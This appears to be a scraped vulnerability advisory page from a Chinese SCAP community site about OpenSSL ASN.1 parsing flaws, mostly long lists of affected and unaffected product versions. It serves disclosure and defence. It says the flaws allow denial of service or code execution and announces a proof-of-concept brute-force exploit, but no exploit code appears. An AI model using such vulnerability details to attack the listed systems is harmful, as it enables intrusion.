- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- RedHat Linux 7.2
- Sun Linux 5.0.3
- Sun Linux 5.0
+ Sun Solaris 9_x86
+ Sun Solaris 9
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
Sun ONE Application Server 7.0 UR2 Standard Edition
Sun ONE Application Server 7.0 UR2 Platform Edition
Sun ONE Application Server 7.0 UR1 Standard Edition
Sun ONE Application Server 7.0 UR1 Platform Edition
Sun ONE Application Server 7.0 Standard Edition
Sun ONE Application Server 7.0 Platform Edition
Sun Java System Web Server 6.1
Sun Grid Engine 5.3 x86
Sun Grid Engine 5.3 Sun Linux
Sun Grid Engine 5.3 64-bit SPARC
Sun Grid Engine 5.3 32-bit SPARC
Sun Cluster 3.1
Sun Cluster 3.0
Stonesoft StoneGate 2.2.1
Stonesoft StoneGate 2.2
Stonesoft StoneGate 2.1
Stonesoft StoneGate 2.0.9
Stonesoft StoneGate 2.0.8
Stonesoft StoneGate 2.0.7
Stonesoft StoneGate 2.0.6
Stonesoft StoneGate 2.0.5
Stonesoft StoneGate 2.0.4
Stonesoft StoneGate 2.0.1
Stonesoft StoneGate 1.7.2
Stonesoft StoneGate 1.7.1
Stonesoft StoneGate 1.7
Stonesoft StoneGate 1.6.3
Stonesoft StoneGate 1.6.2
Stonesoft StoneGate 1.5.18
Stonesoft StoneGate 1.5.17
Stonesoft StoneBeat WebCluster 2.5
Stonesoft StoneBeat WebCluster 2.0
Stonesoft StoneBeat SecurityCluster 2.5
Stonesoft StoneBeat SecurityCluster 2.0
Stonesoft StoneBeat High Availability 3.1
Stonesoft StoneBeat FullCluster for Raptor 2.5
Stonesoft StoneBeat FullCluster for Raptor 2.0
Stonesoft StoneBeat FullCluster for ISA Server 3.0
Stonesoft StoneBeat FullCluster for Gauntlet 2.0
Stonesoft StoneBeat FullCluster for Firewall-1 3.0
Stonesoft StoneBeat FullCluster for Firewall-1 2.0
SSLeay SSLeay 0.9.1
SSLeay SSLeay 0.9
SSLeay SSLeay 0.8.1
SSLeay SSLeay 0.6.6
SSH Communications Security SSH2 3.2.5
SSH Communications Security SSH2 3.2.4
SSH Communications Security SSH2 3.2.3
SSH Communications Security SSH2 3.2.2
SSH Communications Security SSH2 3.2.1
SSH Communications Security SSH2 3.2
SSH Communications Security SSH2 3.1.8
SSH Communications Security SSH2 3.1.7
SSH Communications Security SSH2 3.1.6
SSH Communications Security SSH2 3.1.5
SSH Communications Security SSH2 3.1.4
SSH Communications Security SSH2 3.1.3
SSH Communications Security SSH2 3.1.2
SSH Communications Security SSH2 3.1.1
SSH Communications Security SSH2 3.1
SSH Communications Security SSH Sentinel 1.4
SSH Communications Security IPSEC Express Toolkit
Snapgear Snapgear OS 1.8.4
SmoothWall GPL 1.0
SmoothWall Express 2.0 beta
SGI ProPack 2.3
SGI ProPack 2.2.1
SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.21
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
RedHat Linux 9.0 i386
Oracle Oracle9i Standard Edition 9.2
Oracle Oracle9i Standard Edition 9.0.1
Oracle Oracle9i Standard Edition 8.1.7
Oracle Oracle9i Personal Edition 9.2
Oracle Oracle9i Personal Edition 9.0.1
Oracle Oracle9i Personal Edition 8.1.7
Oracle Oracle9i Enterprise Edition 9.2 .0
Oracle Oracle9i Enterprise Edition 9.0.1
Oracle Oracle9i Enterprise Edition 8.1.7
Oracle Oracle9i Application Server 9.0.3
Oracle Oracle9i Application Server 9.0.2
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle HTTP Server 9.2 .0
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
+ Conectiva Linux 9.0
+ OpenPKG OpenPKG Current
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
+ Conectiva Linux 7.0
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5 a
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
Novell Nsure Audit 1.0.1
Novell Netware 6.5
Novell Netware 6.0
Novell Netware 5.1
Novell NetMail 3.10 e
Novell NetMail 3.10 d
Novell NetMail 3.10 c
Novell NetMail 3.10 b
Novell NetMail 3.10 a
Novell NetMail 3.10
Novell NetMail 3.1
Novell NetMail 3.0.3 b
Novell NetMail 3.0.3 a
- Microsoft Windows 3.11
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.0.3
Novell NetMail 3.0.1
Novell International Cryptographic Infostructure (NICI) 2.6.1
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iChain Server 2.2 SP1
Novell iChain Server 2.2 FP1a
Novell iChain Server 2.2 FP1a
Novell iChain Server 2.2 FP1
Novell iChain Server 2.2
Novell GroupWise WebAccess 6.5 SP2
Novell GroupWise WebAccess 6.5 SP1
Novell GroupWise WebAccess 6.5
Novell GroupWise WebAccess 6.0 SP4
Novell GroupWise Internet Agent 6.5.1
Novell Groupwise 6.5 SP2
Novell Groupwise 6.0 SP4
Novell eDirectory 8.7.1 SU1
Novell eDirectory 8.7.1
Novell eDirectory 8.7
Novell eDirectory 8.6.2
Novell eDirectory 8.5.27
Novell eDirectory 8.5.12 a
Novell eDirectory 8.5
Novell eDirectory 8.0
Novell BorderManager 3.8
Mandriva Linux Mandrake 9.2
Mandriva Linux Mandrake 9.1 ppc
Mandriva Linux Mandrake 9.1
Mandriva Linux Mandrake 9.0
Mandriva Linux Mandrake 8.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Juniper Networks T-series Router T640
Juniper Networks T-series Router T320
Juniper Networks SDX-300 3.1.1
Juniper Networks SDX-300 3.1
Juniper Networks M-series Router M5
Juniper Networks M-series Router M40e
Juniper Networks M-series Router M40
Juniper Networks M-series Router M20
Juniper Networks M-series Router M160
Juniper Networks M-series Router M10
Ingate SIParator 3.2.1
Ingate SIParator 3.2
Ingate Firewall 3.2.1
Ingate Firewall 3.2
IBM Rational Rose 2000
IBM HTTP Server 2.0.47
IBM HTTP Server 2.0.42 .2
IBM HTTP Server 2.0.42
IBM HTTP Server 1.3.28
IBM HTTP Server 1.3.26
IBM HTTP Server 1.3.19
IBM HTTP Server 1.3.12 .4
IBM HTTP Server 1.3.12 .3
IBM HTTP Server 1.3.12 .2
HP HP-UX AAA Server A.06.01.02
+ HP HP-UX 11.11
+ HP HP-UX 11.0
HP HP-UX 11.23
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP WBEM Services for HP-UX A.01.05.05
F5 ISMan
F5 FirePass
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 2.1
F5 BigIP 2.0
F5 3-DNS 4.5
F5 3-DNS 4.4
F5 3-DNS 4.3
F5 3-DNS 4.2
F-Secure SSH 5.3 For Windows
F-Secure SSH 5.2 For Windows
F-Secure SSH 5.1 For Windows
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
F-Secure SSH 3.2.3 For UNIX
F-Secure SSH 3.2 .0 For UNIX
F-Secure SSH 3.1 .0 For UNIX
F-Secure SSH 3.1 .0
F-Secure SSH 3.0.1 For UNIX
- FreeBSD FreeBSD 5.0
- HP HP-UX 11.0
- HP HP-UX 11i v1
- IBM AIX 4.3
- RedHat Linux 7.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Cray Cray Open Software 3.4
Computer Associates eTrust Security Command Center 1.0
Cisco Threat Response
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SIP Proxy Server
Cisco Secure Policy Manager 3.0.1
Cisco PIX Firewall 520
Cisco PIX Firewall 515
Cisco Network Analysis Module 0
Cisco IOS 12.2SY
Cisco IOS 12.2SX
Cisco IOS 12.1(19)E
Cisco IOS 12.1(13.4)E
Cisco IOS 12.1(11b)E
Cisco IOS 12.1(11)E
Cisco GSS 4480 Global Site Selector
Cisco Firewall Services Module (FWSM) 0
Cisco CSS11000 Content Services Switch
Cisco CSS Secure Content Accelerator 2.0
Cisco CSS Secure Content Accelerator 1.0
Cisco CiscoWorks Common Services 2.2
Cisco CiscoWorks 1105 Wireless LAN Solution Engine
Cisco CiscoWorks 1105 Hosting Solution Engine
Cisco Application & Content Networking Software
Check Point Software VPN-1 4.1 SP4
Check Point Software VPN-1 4.1 SP3
Check Point Software VPN-1 4.1 SP2
Check Point Software VPN-1 4.1 SP1
Check Point Software VPN-1 4.1
Check Point Software Providor-1 4.1 SP4
Check Point Software Providor-1 4.1 SP3
Check Point Software Providor-1 4.1 SP2
Check Point Software Providor-1 4.1 SP1
Check Point Software Providor-1 4.1
Check Point Software Nokia Voyager 4.1
Check Point Software Next Generation FP3 HF2
Check Point Software Next Generation FP3 HF1
Check Point Software Next Generation FP3
Check Point Software Next Generation FP2
Check Point Software Next Generation FP1
Check Point Software Firewall-1 4.1 SP6
Check Point Software Firewall-1 4.1 SP5
Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0
BorderWare Firewall Server 7.0
Blue Coat Systems Security Gateway OS 3.0
Blue Coat Systems Security Gateway OS 2.0
Blue Coat Systems CacheOS CA/SA 4.1.10
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.2.7
Apple Mac OS X 10.2.6
Apple Mac OS X 10.2.5
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2
Tarantella Enterprise 3 3.40
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun ONE Web Server 6.0 SP7
Sun ONE Web Server 4.1 SP14
Sun ONE Directory Server 5.1 SP3
Sun ONE Application Server 7.0 UR2 Upgrade Standard
Sun ONE Application Server 7.0 UR2 Upgrade Platform
Sun Java System Web Server 6.1 SP1
Sun Cluster 2.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun Cluster 2.1
- Sun Solaris 2.5.1
- Sun Solaris 2.6
SSH Communications Security SSH2 3.2.9
SSH Communications Security SSH Sentinel 1.4.1
Snapgear Snapgear OS 1.8.5
OpenSSL Project OpenSSL 0.9.7 c
+ OpenPKG OpenPKG 2.0
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
OpenSSL Project OpenSSL 0.9.6 k
+ Blue Coat Systems CacheOS CA/SA 4.1.10
+ Blue Coat Systems Security Gateway OS 3.1
+ Blue Coat Systems Security Gateway OS 3.0
+ Blue Coat Systems Security Gateway OS 2.1.5001 SP1
+ Blue Coat Systems Security Gateway OS 2.1.9
+ Blue Coat Systems Security Gateway OS 2.0
+ Slackware Linux 8.1
Novell Nsure Audit 1.0.3
Novell Nsure Audit 1.0.2
Novell NetMail 3.1 f
Novell iManager 2.5
Novell eDirectory 8.7.1 SU1
Ingate SIParator 3.3.1
Ingate Firewall 3.3.1
IBM Rational RequisitePro 7.0
HP HP-UX AAA Server A.06.01.02.04
HP HP WBEM Services for HP-UX A.01.05.07
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.2.8

- 不受影响的程序版本

Tarantella Enterprise 3 3.40
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun ONE Web Server 6.0 SP7
Sun ONE Web Server 4.1 SP14
Sun ONE Directory Server 5.1 SP3
Sun ONE Application Server 7.0 UR2 Upgrade Standard
Sun ONE Application Server 7.0 UR2 Upgrade Platform
Sun Java System Web Server 6.1 SP1
Sun Cluster 2.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun Cluster 2.1
- Sun Solaris 2.5.1
- Sun Solaris 2.6
SSH Communications Security SSH2 3.2.9
SSH Communications Security SSH Sentinel 1.4.1
Snapgear Snapgear OS 1.8.5
OpenSSL Project OpenSSL 0.9.7 c
+ OpenPKG OpenPKG 2.0
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
OpenSSL Project OpenSSL 0.9.6 k
+ Blue Coat Systems CacheOS CA/SA 4.1.10
+ Blue Coat Systems Security Gateway OS 3.1
+ Blue Coat Systems Security Gateway OS 3.0
+ Blue Coat Systems Security Gateway OS 2.1.5001 SP1
+ Blue Coat Systems Security Gateway OS 2.1.9
+ Blue Coat Systems Security Gateway OS 2.0
+ Slackware Linux 8.1
Novell Nsure Audit 1.0.3
Novell Nsure Audit 1.0.2
Novell NetMail 3.1 f
Novell iManager 2.5
Novell eDirectory 8.7.1 SU1
Ingate SIParator 3.3.1
Ingate Firewall 3.3.1
IBM Rational RequisitePro 7.0
HP HP-UX AAA Server A.06.01.02.04
HP HP WBEM Services for HP-UX A.01.05.07
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.2.8

- 漏洞讨论

Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. Attackers could exploit these issues to cause a denial of service or to execute arbitrary code.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept brute-force exploit has been supplied by Bram Matthys (Syzop):

- 解决方案

Please see the referenced advisories for more information.


HP HP-UX AAA Server A.06.01.02

OpenSSL Project OpenSSL 0.9.6 d

OpenSSL Project OpenSSL 0.9.6 a

OpenSSL Project OpenSSL 0.9.7 beta1

OpenSSL Project OpenSSL 0.9.7 a

SSH Communications Security SSH Sentinel 1.4

Novell iManager 2.0

IBM HTTP Server 2.0.42

Novell NetMail 3.0.1

Novell NetMail 3.0.3 a

SSH Communications Security SSH2 3.1.4

SSH Communications Security SSH2 3.1.6

Novell NetMail 3.10 e

Ingate Firewall 3.2.1

SSH Communications Security SSH2 3.2.2

Sun ONE Directory Server 5.1

Sun Grid Engine 5.3 x86

SGI IRIX 6.5.20 f

SGI IRIX 6.5.20 m

SGI IRIX 6.5.21 m

Mandriva Linux Mandrake 9.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站